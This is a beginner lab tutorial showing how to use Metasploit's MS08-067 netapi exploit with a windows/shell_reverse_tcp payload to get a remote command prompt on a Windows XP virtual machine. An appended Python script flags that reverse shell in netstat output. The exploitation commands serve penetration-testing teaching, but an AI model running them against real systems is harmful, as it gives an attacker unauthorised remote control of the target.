Metasploit/Exploit #1: Introduction to Metasploit and How to Hack Windows Command Prompt Using Metasploit Framework







In this tutorial, I want to share how to hack the Windows command prompt using Metasploit. Metasploit works by taking advantage of a system's vulnerabilities and weaknesses. Metasploit is equipped with modules and payloads that we can use to take advantage of the system. Metasploit is a great framework with extreme flexibility that we can use to launch an attack. Before I proceed with the hacking tutorial, below is some terminology that will help you understand more about Metasploit.

  1. Vulnerability - A known weakness in a targeted system that can be taken advantage of.
  2. Exploit - The actual code that is used to compromise a system.
  3. Payload - The actual code that will run on the compromised system (the activity that will be executed on the targeted machine).

To use Metasploit for your hacking purposes, I will share how to hack a Windows command prompt using Metasploit. This test is done in my virtual lab. Please check my previous tutorial on how to build a network hacking and penetration testing lab. I'm using Windows XP Service Pack 2 as my targeted machine.

Steps

  1. Search for Windows Vulnerability module.
  2. Set the Payload.
  3. Exploit.
  4. Check Windows Operating System.

Steps Details

1. Search for Windows Vulnerability module.

We will be using the "netapi" module to exploit Windows XP. This module was written by a security researcher to take advantage of the system vulnerability.

1.1) Search for the module called "netapi".



1.2) Use the "netapi" module to launch an exploit.
Copy the exploit name.
Type in "use exploit/windows/smb/ms08_067_netapi"

Once you are in the netapi module, display the settings by typing "show options".




1.3) Set the RHOST (Remote Host) IP address, that is, the targeted machine's IP address. My targeted machine's IP address is 10.10.10.4.

Type in "set RHOST 10.10.10.4"

2. Set the Payload.

The payload is the activity that we want to execute on the targeted machine once it has been compromised. There are a few types of payload that we can use in Metasploit. I will cover more on this in my next tutorial.

2.1) Type in "set PAYLOAD windows/shell_reverse_tcp".
2.2) Set the Local Host (LHOST) IP address and Local Port (LPORT) id. The local port id is the port that will be used to drop in the payload. In this tutorial, Metasploit will use port "600".

Type in "set LPORT 600"
The LPORT is changed from 1234 to 600.

3. Exploit.

3.1) Check the exploit and payload settings by typing "show options".

3.2) To start the exploitation,

Type "exploit".

Metasploit will execute the exploit and payload, which will get you into the Windows XP command prompt.
Voilà!!

4. Check Windows Operating System.

4.1) When the connection in Metasploit is successful, open the Windows machine and type in "netstat" to see the external connection to the system.

You can manipulate data remotely using the command prompt on your targeted machine.
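
The netstat check in step 4.1 is also how a defender finds this session: the windows/shell_reverse_tcp payload appears as an ESTABLISHED connection from the Windows machine out to the LPORT (600 here). The Python code below is an added example, not part of the original tutorial; the sample "netstat -ano" output, the remote address 10.10.10.5, the PIDs and the port allowlist are constructed assumptions.

```python
# Flag outbound TCP sessions to unexpected remote ports in `netstat -ano` output.
# SAMPLE is constructed for illustration; 10.10.10.5 and the PIDs are assumptions.
SAMPLE = """
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       952
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    10.10.10.4:139         0.0.0.0:0              LISTENING       4
  TCP    10.10.10.4:1036        10.10.10.5:600         ESTABLISHED     1180
  TCP    10.10.10.4:1041        10.10.10.20:80         ESTABLISHED     1432
  UDP    0.0.0.0:445            *:*                                    4
"""

# Remote ports this host is expected to talk to (assumption; tune per environment).
EXPECTED_REMOTE_PORTS = {53, 80, 443, 445}


def parse_netstat(text):
    """Return one dict per TCP row; headers, UDP rows and malformed lines are skipped."""
    rows = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) != 5 or fields[0] != "TCP":
            continue
        _, local, remote, state, pid = fields
        lport = local.rpartition(":")[2]   # rpartition also copes with [::]:445
        rport = remote.rpartition(":")[2]
        if not (lport.isdigit() and rport.isdigit() and pid.isdigit()):
            continue
        rows.append({"local": local, "remote": remote, "state": state,
                     "lport": int(lport), "rport": int(rport), "pid": int(pid)})
    return rows


def suspicious_outbound(rows, expected=EXPECTED_REMOTE_PORTS):
    """ESTABLISHED sessions the host initiated to a remote port outside the allowlist."""
    listening = {r["lport"] for r in rows if r["state"] == "LISTENING"}
    return [r for r in rows
            if r["state"] == "ESTABLISHED"
            and r["lport"] not in listening    # not an inbound hit on a local service
            and r["rport"] not in expected]


if __name__ == "__main__":
    for hit in suspicious_outbound(parse_netstat(SAMPLE)):
        print("review PID %(pid)d: %(local)s -> %(remote)s" % hit)
```

A port allowlist only catches sessions on unusual ports such as 600; a session to an allowed port needs the PID mapped to its process (for example with tasklist) to be judged.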
